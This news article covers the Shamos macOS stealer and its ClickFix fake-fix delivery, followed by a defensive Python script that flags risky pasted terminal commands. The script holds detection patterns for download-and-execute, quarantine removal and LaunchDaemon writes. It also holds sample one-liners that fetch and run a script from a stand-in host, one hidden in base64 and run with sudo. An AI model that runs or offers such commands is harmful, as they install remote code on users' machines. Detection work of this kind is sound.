New ‘Shamos’ Malware Poses as Mac Fixes to Steal Sensitive Data

A newly discovered Mac malware named Shamos is being spread through deceptive ClickFix attacks that disguise themselves as troubleshooting guides or system fixes. Security researchers at CrowdStrike say Shamos is a variant of the Atomic macOS Stealer (AMOS), created by the group “COOKIE SPIDER,” and is capable of stealing browser data, Keychain items, Apple Notes, and cryptocurrency wallet information. Since June 2025, more than 300 environments worldwide have been targeted.

Victims are tricked into running malicious commands copied from fake ads or GitHub repositories; instead of fixing issues, these commands install Shamos through a downloaded Bash script. The malware bypasses Gatekeeper protections, checks for sandbox environments, and then gathers sensitive files before sending them to attackers. If run with elevated privileges, it establishes persistence by installing a malicious LaunchDaemon and can also fetch additional payloads like fake Ledger apps or botnet modules.

Experts warn macOS users not to execute online commands they don’t fully understand and to avoid sponsored search results when troubleshooting. Safer alternatives include Apple’s official forums or the system’s built-in help features. ClickFix attacks have become a widespread tactic in recent years; they have also been used to spread ransomware and have even been adopted by state-sponsored hackers.
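As an added illustration (not code from CrowdStrike or from this article), the following Python sketch triages a command copied from a "fix" page before anyone runs it: it flags download-and-execute structure and decodes base64 tokens to reveal any URL they hide. The trait patterns are general heuristics assumed here, not indicators published for Shamos, and the function names and sample commands are constructed.

```python
import base64
import re

# Heuristic traits of a pasted terminal one-liner. These are assumed, general
# patterns, not indicators published for Shamos.
TRAITS = {
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(/bin/)?(ba|z)?sh\b"),
    "shell_runs_downloaded_text": re.compile(
        r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    # xattr edits the quarantine flag that Gatekeeper checks rely on.
    "quarantine_attribute_removed": re.compile(
        r"\bxattr\b.*com\.apple\.quarantine"),
    "writes_launchdaemon": re.compile(r"/Library/LaunchDaemons/"),
    "elevated_privileges": re.compile(r"\bsudo\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s\"')]+")


def hidden_urls(cmd):
    """Decode base64-looking tokens and return any URLs they conceal."""
    found = []
    for token in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:  # bad padding, non-base64 text, or non-UTF-8 bytes
            continue
        found += URL.findall(text)
    return found


def triage(cmd):
    """Return (matched trait names, URLs hidden in base64 tokens)."""
    traits = [name for name, rx in TRAITS.items() if rx.search(cmd)]
    return traits, hidden_urls(cmd)


# Constructed samples; example.invalid is a reserved, non-resolving domain.
_B64 = base64.b64encode(b"https://example.invalid/fix.sh").decode()
SAMPLE_FAKE_FIX = f'/bin/bash -c "$(curl -fsSL $(echo {_B64} | base64 -d))"'
SAMPLE_PIPED = "curl -fsSL https://example.invalid/fix.sh | sudo bash"
SAMPLE_BENIGN = "softwareupdate --list"

if __name__ == "__main__":
    for sample in (SAMPLE_FAKE_FIX, SAMPLE_PIPED, SAMPLE_BENIGN):
        print(sample, "->", triage(sample))
```

A match is a reason to stop and read the command rather than a verdict; legitimate installers also pipe downloads into a shell.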
